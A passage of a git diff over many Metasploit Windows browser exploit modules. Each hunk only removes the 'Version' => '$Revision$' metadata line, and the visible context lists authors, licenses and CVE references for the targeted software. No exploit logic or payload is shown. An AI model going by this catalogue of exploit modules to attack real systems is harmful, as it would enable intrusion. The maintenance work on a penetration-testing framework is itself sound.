b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'jduck', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0886' ], diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index 80d8d2827f..105bc4dca4 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'jduck', # Bug reported to Oracle by TELUS - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0500' ], diff --git a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb index cd2c9b211e..89ef3ca46b 100644 --- a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb +++ b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'patrick', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-2086' ], diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index 9faf8d98e2..5445a69191 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5217' ], diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index 574b911edf..7a43372ec8 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2918' ], diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb index d31eec99d1..fd28bef942 100644 --- a/modules/exploits/windows/browser/lpviewer_url.rb +++ b/modules/exploits/windows/browser/lpviewer_url.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4384' ], diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb index 217644a1fb..a66a68e35f 100644 --- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb +++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5660' ], diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index a7eaf63953..c9b4c747fb 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5660' ], diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index 3e911ebc58..f7b28c1be2 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'skape', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3961'], diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index 2020a8bbc0..a9344df519 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-6707'], diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index c31c369193..2536010624 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-1336'], diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index d04db87275..2147fb915b 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote 'unknown', # discovered in the wild 'scriptjunkie' # Metasploit module, functionality/portability fixes ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-3765'], diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index 180f6311fe..498c89a6c8 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Rh0', # metasploit module 'mr_me ' # win7 target ], - 'Version' => "$Revision$", 'References' => [ ['CVE', '2011-0065'], diff --git a/modules/exploits/windows/browser/mozilla_nstreerange.rb b/modules/exploits/windows/browser/mozilla_nstreerange.rb index 8cb1b15f2a..2ec74be8f6 100644 --- a/modules/exploits/windows/browser/mozilla_nstreerange.rb +++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb @@ -43,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'regenrecht', # discovered and sold to ZDI 'xero', # Shenanigans ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-0073'], diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb index 3c39e6c1cd..a42e0842c7 100644 --- a/modules/exploits/windows/browser/mozilla_reduceright.rb +++ b/modules/exploits/windows/browser/mozilla_reduceright.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote typical browser exploit) in order to gain control of the machine. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Chris Rohlf', #Matasano Security (Initial discovery according to Mozilla.org) diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index 2ee98f2602..064d091981 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'skape', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0344' ], diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index fd64d0cd68..aadec4f7b0 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb +++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'san ', 'O600KO78RUS@unknown.ru', ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2005-4560'], diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index fcfcfb0951..78f17ae2fd 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote '', 'Unknown', ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-1359'], diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb index 22efce39c9..3ed3ebaaa7 100644 --- a/modules/exploits/windows/browser/ms06_055_vml_method.rb +++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Mr.Niega ', 'M. Shirk ' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-4868' ], diff --git a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb index a3b25d2407..b911b49b65 100644 --- a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb +++ b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'hdm', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3730'], diff --git a/modules/exploits/windows/browser/ms06_067_keyframe.rb b/modules/exploits/windows/browser/ms06_067_keyframe.rb index 73886aea0a..596c36d49b 100644 --- a/modules/exploits/windows/browser/ms06_067_keyframe.rb +++ b/modules/exploits/windows/browser/ms06_067_keyframe.rb @@ -46,7 +46,6 @@ class Metasploit3 < Msf::Exploit::Remote # Integrated into msf 'skape', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4777' ], diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index 1696b99e89..3a5dcaf8bc 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Trirat Puttaraksa ', ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-5745' ], diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb index 86ec169f89..6a517987dd 100644 --- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb @@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Solar Eclipse ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-0038'], diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index 9bccf2ce06..442c6bff5b 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2463' ], diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb index cd5b11c3b9..6454af7d66 100644 --- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb +++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3008' ], diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb index b53607078b..c99285fae3 100644 --- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'koshi', 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3704' ], diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb index c6e25875ab..01d1d56384 100644 --- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb +++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb @@ -41,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'hdm' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-4844'], diff --git a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb index 659215e8ff..29b66701d9 100644 --- a/modules/exploits/windows/browser/ms09_002_memory_corruption.rb +++ b/modules/exploits/windows/browser/ms09_002_memory_corruption.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean [at] zerodaysolutions [dot] com' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0075' ], diff --git a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb index cb1b3b072f..0aa165ea7b 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1534' ], diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb index b7721d9759..92a3573463 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'unknown', 'hdm', 'Ahmed Obied', 'DSR! ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1136' ], diff --git a/modules/exploits/windows/browser/ms09_072_style_object.rb b/modules/exploits/windows/browser/ms09_072_style_object.rb index 95578b2ab0..9c925c5d32 100644 --- a/modules/exploits/windows/browser/ms09_072_style_object.rb +++ b/modules/exploits/windows/browser/ms09_072_style_object.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'securitylab.ir ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS09-072'], diff --git a/modules/exploits/windows/browser/ms10_002_aurora.rb b/modules/exploits/windows/browser/ms10_002_aurora.rb index e2aaa14a67..0a345a517c 100644 --- a/modules/exploits/windows/browser/ms10_002_aurora.rb +++ b/modules/exploits/windows/browser/ms10_002_aurora.rb @@ -41,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote 'unknown', 'hdm' # Metasploit port ], - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS10-002'], diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb index c830294d00..773f87a04b 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb @@ -69,7 +69,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Nanika', # HIT2010 IE7 reliable PoC 'jduck' # minor cleanups ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0806' ], diff --git a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb index 7609fa7da6..c5b15dc774 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Unknown', # original discovery 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0805' ], diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index e1b428c919..1b0613c12c 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb @@ -36,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0483' ], diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index 50f3f92b38..4cc5458e55 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Jordi Sanchez ', # Metasploit module - Help ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-0480'], diff --git a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb index aaae2367ad..b96b8bc8cb 100644 --- a/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb +++ b/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb @@ -44,7 +44,6 @@ class Metasploit3 < Msf::Exploit::Remote 'natron' # Metasploit version ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1885' ], diff --git a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb index 2eaa8e922a..f424617772 100644 --- a/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'B_H' # Clean LNK template ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-2568'], diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index 0aeaac5fe0..cee5f962a6 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -53,7 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Matteo Memelli', # exploit-db version 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3962' ], diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index 8306a557d3..f255c00450 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -44,7 +44,6 @@ class Metasploit3 < Msf::Exploit::Remote 'd0c_s4vage', # First working public exploit 'jduck' # Metasploit module (ROP, @WTFuzz spray) ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3971' ], diff --git a/modules/exploits/windows/browser/msvidctl_mpeg2.rb b/modules/exploits/windows/browser/msvidctl_mpeg2.rb index 750524f7ff..38d3585e30 100644 --- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb +++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb @@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0015' ], diff --git a/modules/exploits/windows/browser/mswhale_checkforupdates.rb b/modules/exploits/windows/browser/mswhale_checkforupdates.rb index 17ee1d1d24..ce81cea30f 100644 --- a/modules/exploits/windows/browser/mswhale_checkforupdates.rb +++ b/modules/exploits/windows/browser/mswhale_checkforupdates.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2238' ], diff --git a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb index ed2060f8e4..2fd2977c36 100644 --- a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb +++ b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'dookie', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-0018' ], diff --git a/modules/exploits/windows/browser/nis2004_antispam.rb b/modules/exploits/windows/browser/nis2004_antispam.rb index cd162f9325..baca22059e 100644 --- a/modules/exploits/windows/browser/nis2004_antispam.rb +++ b/modules/exploits/windows/browser/nis2004_antispam.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0363' ], diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb index 68028d95db..99468bd8f9 100644 --- a/modules/exploits/windows/browser/nis2004_get.rb +++ b/modules/exploits/windows/browser/nis2004_get.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1689' ], diff --git a/modules/exploits/windows/browser/novelliprint_callbackurl.rb b/modules/exploits/windows/browser/novelliprint_callbackurl.rb index 2ac1dd3149..3dfb53c342 100644 --- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb +++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb @@ -52,7 +52,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1527' ], diff --git a/modules/exploits/windows/browser/novelliprint_datetime.rb b/modules/exploits/windows/browser/novelliprint_datetime.rb index 830ab82a1c..6f02766bd3 100644 --- a/modules/exploits/windows/browser/novelliprint_datetime.rb +++ b/modules/exploits/windows/browser/novelliprint_datetime.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1569' ], diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb index 2c69e7aa9d..f38251f563 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0935' ], diff --git a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb index 0f83732a6e..003743a2ef 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb @@ -51,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3106' ], diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index df69d927d3..bec17f874b 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2908'], diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb index 6fe009e8b3..0443392adf 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # metasploit module 'Dr_IDE' # original Exploit from exploit-db.com ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-4321' ], diff --git a/modules/exploits/windows/browser/novelliprint_target_frame.rb b/modules/exploits/windows/browser/novelliprint_target_frame.rb index 355ce95353..918f8aac83 100644 --- a/modules/exploits/windows/browser/novelliprint_target_frame.rb +++ b/modules/exploits/windows/browser/novelliprint_target_frame.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1568' ], diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb index ea824475c9..54ea81754c 100644 --- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb +++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4607' ], diff --git a/modules/exploits/windows/browser/orbit_connecting.rb b/modules/exploits/windows/browser/orbit_connecting.rb index 6229e62208..33b1424926 100644 --- a/modules/exploits/windows/browser/orbit_connecting.rb +++ b/modules/exploits/windows/browser/orbit_connecting.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0187' ], diff --git a/modules/exploits/windows/browser/pcvue_func.rb b/modules/exploits/windows/browser/pcvue_func.rb index 471b5fda93..52cdb83d3e 100644 --- a/modules/exploits/windows/browser/pcvue_func.rb +++ b/modules/exploits/windows/browser/pcvue_func.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mr_me ', # msf module 'TecR0c ',# msf module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4915'], diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb index 4b533c2f11..a1c031c703 100644 --- a/modules/exploits/windows/browser/persits_xupload_traversal.rb +++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3693'], diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb index d77e295278..c44aa0c37d 100644 --- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb +++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'rgod', #Initial discovery, poc 'sinn3r', #msf ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '71559' ], diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb index b062117d2c..040b7d28fc 100644 --- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb +++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'bannedit', 'sinn3r' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-3747' ], diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb index 95ebaa38a8..7f00c926a0 100644 --- a/modules/exploits/windows/browser/realplayer_console.rb +++ b/modules/exploits/windows/browser/realplayer_console.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Elazar Broad ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1309' ], diff --git a/modules/exploits/windows/browser/realplayer_import.rb b/modules/exploits/windows/browser/realplayer_import.rb index 3003ef4e1e..8c9c163770 100644 --- a/modules/exploits/windows/browser/realplayer_import.rb +++ b/modules/exploits/windows/browser/realplayer_import.rb @@ -23,7 +23,6 @@ class Metasploit3 